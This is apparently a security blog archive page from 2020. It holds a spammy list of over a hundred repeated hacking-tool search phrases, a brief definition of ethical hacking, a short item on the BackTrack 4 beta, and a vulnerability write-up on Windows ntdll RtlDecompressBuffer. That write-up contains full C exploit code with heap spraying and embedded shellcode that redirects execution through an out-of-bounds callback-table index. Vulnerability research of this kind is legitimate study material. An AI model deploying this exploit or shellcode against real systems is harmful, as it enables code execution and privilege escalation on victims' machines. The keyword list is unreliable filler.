Monday, August 31, 2020

Zirikatu Tool - Fud Payload Generator Script

Read more


  1. Pentest Tools Website Vulnerability
  2. What Are Hacking Tools
  3. New Hacker Tools
  4. Pentest Tools Website Vulnerability
  5. Hacking Tools For Windows
  6. How To Install Pentest Tools In Ubuntu
  7. Game Hacking
  8. Hacks And Tools
  9. Computer Hacker
  10. Hacking Tools
  11. How To Hack
  12. Hacker Tools Mac
  13. Hacking Tools Online
  14. Hack Rom Tools
  15. Pentest Tools Online
  16. Hacker Tools Hardware
  17. Hack Tools For Ubuntu
  18. Hack Tools
  19. Hacker Tools For Pc
  20. Termux Hacking Tools 2019
  21. Hacking Tools For Beginners
  22. Hack Tools For Mac
  23. Pentest Tools Website Vulnerability
  24. What Is Hacking Tools
  25. Pentest Recon Tools
  26. Hacking Tools 2019
  27. Wifi Hacker Tools For Windows
  28. New Hack Tools
  29. Hacking Tools
  30. How To Make Hacking Tools
  31. Hack Tools Download
  32. Best Hacking Tools 2019
  33. Blackhat Hacker Tools
  34. Hacker Tools For Windows
  35. Hacker Tools For Mac
  36. Hack Tools For Games
  37. Hacker Tools
  38. Hacker Tools Free Download
  39. Pentest Reporting Tools
  40. Pentest Tools Alternative
  41. Hack Tools Online
  42. Hacker Techniques Tools And Incident Handling
  43. Hacking Tools Mac
  44. Pentest Tools Bluekeep
  45. Bluetooth Hacking Tools Kali
  46. Hacking Tools For Mac
  47. Hacking Tools Kit
  48. Hacker Tools Hardware
  49. Nsa Hack Tools Download
  50. Hack Website Online Tool
  51. Hack Tools For Windows
  52. Pentest Box Tools Download
  53. Hacker Tools List
  54. Hack Rom Tools
  55. Hacker Tools Apk
  56. Hacking Tools Hardware
  57. Pentest Tools For Android
  58. Pentest Tools Github
  59. Pentest Tools Github
  60. Hack Tools Pc
  61. Hacker Tools
  62. Termux Hacking Tools 2019
  63. Hacking Tools Software
  64. Growth Hacker Tools
  65. Hacker Techniques Tools And Incident Handling
  66. Hacker Tool Kit
  67. Pentest Tools Android
  68. Pentest Tools Kali Linux
  69. Hacker Tools
  70. Hacking Tools For Windows 7
  71. World No 1 Hacker Software
  72. Hacking Apps
  73. Top Pentest Tools
  74. Hacks And Tools
  75. Pentest Tools Bluekeep
  76. Hacker Tools Free Download
  77. Tools Used For Hacking
  78. Hacking Apps
  79. Hacker Tools 2019
  80. Hack App
  81. Hacking Tools Name
  82. Hack Tools 2019
  83. Pentest Reporting Tools
  84. Pentest Tools Online
  85. Pentest Tools List
  86. Hack Tools For Pc
  87. Tools Used For Hacking
  88. Hacker Techniques Tools And Incident Handling
  89. Black Hat Hacker Tools
  90. Hacking Tools Github
  91. New Hacker Tools
  92. Pentest Tools Website
  93. Hacker Tools Windows
  94. How To Install Pentest Tools In Ubuntu
  95. Pentest Tools For Android
  96. How To Make Hacking Tools
  97. Wifi Hacker Tools For Windows
  98. Hacker
  99. Pentest Tools For Android
  100. Pentest Tools Nmap
  101. Hacking Tools 2019
  102. Hack Tools For Pc
  103. Hack App
  104. Best Hacking Tools 2019
  105. Hack Tools For Windows
  106. Nsa Hack Tools Download
  107. Pentest Tools For Windows
  108. Tools Used For Hacking
  109. Hacking Tools
  110. Pentest Tools Url Fuzzer
  111. New Hack Tools
  112. Pentest Tools Kali Linux
  113. Hacker Tools Github
  114. Hack Tools Online
  115. Hacker Tools Apk Download
  116. Hack Tools Download
  117. Best Hacking Tools 2019
  118. What Are Hacking Tools
  119. Hacker Search Tools

Sunday, August 30, 2020

WHAT IS ETHICAL HACKING

What is ethical hacking?

Ethical hacking is identifying weakness in computer system and/or computer networks and coming with countermeasures that protect the weakness.

Ethical hackers must abide by the following rules-
1-Get written permission from the owner of the computer system and/or computer network before  hacking.
2-Protect the privacy of the organisation been hacked etc.

Ethical Hacking and Ethical Hacker are terms used to describe hacking performed by a company or individual to help identity potential threats on a computer or network.
 

An Ethical Hacker attempts to byepass system security and search for any weak point that could be exploited by Malicious Hackers.

Related word


RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:


int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
int result; // eax@4

if ( algorithm & algorithm != 1 )
{
if ( algorithm & 0xF0 )
result = -1073741217;
else
result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
}
else
{
result = -1073741811;
}
return result;
}

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.



let's check the disassembly on Win7 32bits:

  • the movzx limits the boundaries to 16bits
  • the test ax, ax avoids the algorithm 0
  • the cmp ax, 1 avoids the algorithm 1
  • the test al, 0F0h limits the boundary .. wait .. al?


Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 



So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:


And the exploit code:

/*
ntdll!RtlDecompressBuffer() vtable exploit + heap spray
by @sha0coder

*/

#include
#include
#include

#define KB 1024
#define MB 1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
printf("%s\n\n", msg);
exit(1);
}

PUCHAR spray(HANDLE heap) {
PUCHAR map = 0;

printf("Spraying ...\n");
printf("Aproximating to %p\n", landing_ptr);

while (map < landing_ptr-1*MB) {
map = HeapAlloc(heap, 0, 1*MB);
}

//map = HeapAlloc(heap, 0, 1*MB);

printf("Aproximated to [%x - %x]\n", map, map+1*MB);


printf("Landing adddr: %x\n", landing_ptr);
printf("Offset of landing adddr: %d\n", landing_ptr-map);

return map;
}

void landing_sigtrap(int num_of_traps) {
memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
memcpy(landing_ptr, shellcode, strlen(shellcode));

}

int main(int argc, char **argv) {
FARPROC RtlDecompressBuffer;
NTSTATUS ntStat;
HANDLE heap;
PUCHAR compressed, uncompressed;
ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

heap = GetProcessHeap();

compressed_sz = estimated_uncompressed_sz = 1*KB;

compressed = HeapAlloc(heap, 0, compressed_sz);

uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);


spray(heap);
copy_shellcode();
//landing_sigtrap(1*KB);
printf("Landing ...\n");

ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

switch(ntStat) {
case STATUS_SUCCESS:
printf("decompression Ok!\n");
break;

case STATUS_INVALID_PARAMETER:
printf("bad compression parameter\n");
break;


case STATUS_UNSUPPORTED_COMPRESSION:
printf("unsuported compression\n");
break;

case STATUS_BAD_COMPRESSION_BUFFER:
printf("Need more uncompressed buffer\n");
break;

default:
printf("weird decompression state\n");
break;
}

printf("end.\n");
}

The attack vector
This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7
More information

Saturday, August 29, 2020

Backtrack4



The Remote Exploit Development Team has just announced BackTrack 4 Beta. BackTrack is a Linux based LiveCD intended for security testing and we've been watching the project since the very early days. They say this new beta is both stable and usable. They've moved towards behaving like an actual distribution: it's based on Debian core, they use Ubuntu software, and they're running their own BackTrack repositories for future updates. There are a lot of new features, but the one we're most interested in is the built in Pico card support. You can use the FPGAs to generate rainbow tables and do lookups for things like WPA, GSM, and Bluetooth cracking. BackTrack ISO and VMWare images are available here.




Related posts